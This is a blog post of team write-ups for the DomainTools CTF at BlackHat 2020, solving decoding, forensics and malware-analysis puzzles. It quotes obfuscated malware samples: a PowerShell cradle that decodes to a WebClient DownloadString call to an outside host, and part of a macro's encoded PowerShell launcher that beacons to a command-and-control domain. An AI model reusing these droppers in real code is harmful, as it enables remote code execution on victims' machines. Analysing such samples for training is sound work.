Monday, August 17, 2020

DomainTools CTF - BlackHat 2020

This year we'd participated in BlackHat CTF challenge organized by DomainTools.

Our team Homeless took 8th place.



Write-ups

Flip It & Reverse It! (10)




Solution:

To solve this task we wrote the words in reverse order and got next text:
domain tools rules!
And this is the flag for this task.

Powershell Fun! (20)


Solution:

We checked the file content:

& ( $enV:comSPec[4,15,25]-joiN'')(NeW-ObjECT SySTem.io.CoMPResSIOn.dEFLateSTrEam([io.MeMORYSTReAM] [SySTem.CoNvERt]::FROmbaSe64STRIng( 'PVHRitswEPwVPbSWfSSH1lpZ0j05LaUVnMWhCxgcQl98GB8hV2joS9t/76xb+mBrvJqdnR1Xqq5/HMp6+HD5pPTdMJc73dznw/BysjuiXXvev76tV60bVZ+ej2XNn88PD69v6VorrdWu1sEnIu7JuEzUFTJU2BXf9kRUiNyMarLtaGMV7EAURttmak0fQsKx2Ha20s4jiJU8louLMwQnEQPNthMbXBnQaCGKEzsMpSVCwnRbNUbpz7btfRhREKXMXR+8fM0xTJ2HuVBBd5AK5KDRTUwzd7kL8ErwHOUigzhvAzygScGK+PRvT5wGonaAKduNWKIKQVaq2GaYJ2pHFyr2mX3hODg/O4MhvWBeXAe8cKycnZwZuRs5LiA43yMItnjDZITSwBbZzNEjCAvzbrG8bDNyjJNgKjYiwZ5d5eGJCAEzoiPxh20Y/4TweEkPddNLClKSJEjCZPQnT7Jc2nIzgo1W++eny3rUs6Bvj+mo9KT3358u6aZ0/n9dSe1xvelBg3ZJR71sd1tD0sJKN13+8qV1BESHwF7/Uu/Vz1qdPn45lLM6rdfj+d3XRv1WjWqaPw==' ) , [SYStem.iO.coMPReSSIOn.COMPrESSIONMOde]::DEComPreSS) |foreAch-oBJEct{ NeW-ObjECT IO.sTreAMrEADeR($_, [SySTEm.tExT.ENcodiNg]::asCii)}| foReaCh-OBjEct {$_.rEAdTOend()} )

Then we decoded yellow string using base64 with Raw Inflate using CyberChef https://gchq.github.io/CyberChef

After that we prepared the list of number for the next string:

87I114@105N116R101R45R72@111R115d116I32W39&83M118W32N120@88I120g32d34@104W116&116&34R59d105Z101R88I32Z40&110@101g119Z45I111g98I106@101g99W116N32@78W101&116N46@87W101d98Z67R108&105M101d110I116Z41d46N68R111@119d110N108d111g97N100I83W116Z114@105Z110W103M40&36W120&88N120&43N34R112W58&47N47R49M57d50d46@49M54g56d46g49&53Z50W46W49g50d57@34@43@34&109N34M43d34d97Z103R105g34g43N34N99Z34g41R39g32@45&70W111M114d101W103@114N111N117&110d100@67R111N108&111g114g32I71Z114I101&101Z110

and got next:

87, 114, 105, 116, 101, 45, 72, 111, 115, 116, 32, 39, 83, 118, 32, 120, 88, 120, 32, 34, 104, 116, 116, 34, 59, 105, 101, 88, 32, 40, 110, 101, 119, 45, 111, 98, 106, 101, 99, 116, 32, 78, 101, 116, 46, 87, 101, 98, 67, 108, 105, 101, 110, 116, 41, 46, 68, 111, 119, 110, 108, 111, 97, 100, 83, 116, 114, 105, 110, 103, 40, 36, 120, 88, 120, 43, 34, 112, 58, 47, 47, 49, 57, 50, 46, 49, 54, 56, 46, 49, 53, 50, 46, 49, 50, 57, 34, 43, 34, 109, 34, 43, 34, 97, 103, 105, 34, 43, 34, 99, 34, 41, 39, 32, 45, 70, 111, 114, 101, 103, 114, 111, 117, 110, 100, 67, 111, 108, 111, 114, 32, 71, 114, 101, 101, 110

Then we converted from decimal to text:

And got the URL, which is the flag

Keylogging is Fun (25)



Solution:

We used scdbg for solving this task. After start we checked the result of shellcode emulation.
As a result we've got the path "C:\Windows\Temp\log.bin"

Messy JS! (30)



Solution:

We just put it to form on site and after execution we go the flag


You've Been Pwn3d (30)



Solution:

We use ltrace. It intercepts and records dynamic library calls which are called by an executed process and the signals received by that process.
And we got the flag in its output:

...
[pid 3001] inet_addr("127.0.0.1") = 0x100007f
[pid 3001] htons(1984, 0x7fc68146c950, 0x100007f, 0) = 0xc007
...

Flag: 1984

Guess the Pass (40)


Solution:

After analyzing strings in binary, we discovered next data:

...
encodeeJyzMNdRMDQwBBEWOgqWlkCGIZhnCRU3NdBRMDODyZtD1RiAtZlARAwNzQDKrwzB\nbase64
...

We used CyberChef to decode and get the flag:


Flag: Welcome2Blackhat


Macho Madness (40)


Solution:

We checked ZIP file using deployed VM and got port 1337.

Flag: 1337

Doggo Secrets (10)


Solution:

After extracting we got file oh_hi.gpj . 
Then we replaced the file extension to jpg and opened with image viewer.
Image had the flag DT_CTF_123!@#

Flag: DT_CTF_123!@#

Noise To Signal (20)


 oh_hi.zip f

Solution:


We used text analyzer to check human-readable words. 


After several minutes of searching, we discovered word phisheye that was the flag.

Flag: phisheye 

Sweet logo, dude! (20)



Solution:

Firstly we unzip the file (logo.jpg was the archive). 
Then we got the file hmmm.txt with the following text:

FKWcp1W1oTImZGVm

Then we tried different ways to decode and finally we got the flag:


Flag: IrisRules123

Hack the Hacker (25)




Solution:

We used Wireshark to solve the task. We checked the internal traffic and discovered IP address that brutefoced 192.168.152.135.
Finally we got the flag from basic auth header

Authorization: Basic emVyb2Nvb2w6aGFja2Vy  which is base64 decoded zerocool:hacker.

Flag: hacker

Hire the Hacker (30)



Solution:

Firstly, we renamed DadeResume.docm to DadeResume.zip.
Then we checked vbaProject.bin using olevba and got someembedded PowerShell code:

...
cxn = "powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVg"
cxn = cxn + "BlAHIAUwBpAE8AbgBUAGEAYgBsAEUALgBQAFMAVgBFAFIAcwBp"
cxn = cxn + "AG8AbgAuAE0AQQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABkAD"
cxn = cxn + "MAOQA4ADIAPQBbAFIAZQBGAF0ALgBBAFMAcwBlAG0AQgBsAHkA"
...

We converted all data in cxn variables to ione string and decoded using base64.
Result had several encoded strings, after base64 decoding we got the flag.

aAB0AHQAcAA6AC8ALwBzAHUAcABlAHIAcwBlAGsAcgBlAHQAZABvAG0AYQBpAG4ALgBuAGUAdAA6ADYANgA2ADYA  -> http://supersekretdomain.net:6666

Flag: supersekretdomain.net

RIP Your E-Commerce Website (40)



Solution:


After deobfuscation of js code and several minutes of analyzing, we got the flag.

Flag: http://domaintoolsctf.com/checkout/form.js

SHA1 is dead, long live SHA1! (10)


Solution:

This task was really easy, we just used sha1-online.com


Data Blob in the Log! (10)



Solution:

We used ROT13 decode to get the flag.

Flag: iris!

DB Pwn3d! (20)




Solution:

We used online MD5 decrypt tool


Flag: Password123


Get XOR'd! (20)




Solution:

We used CyberChef to decrypt:

Flag: HACKTHEPLANET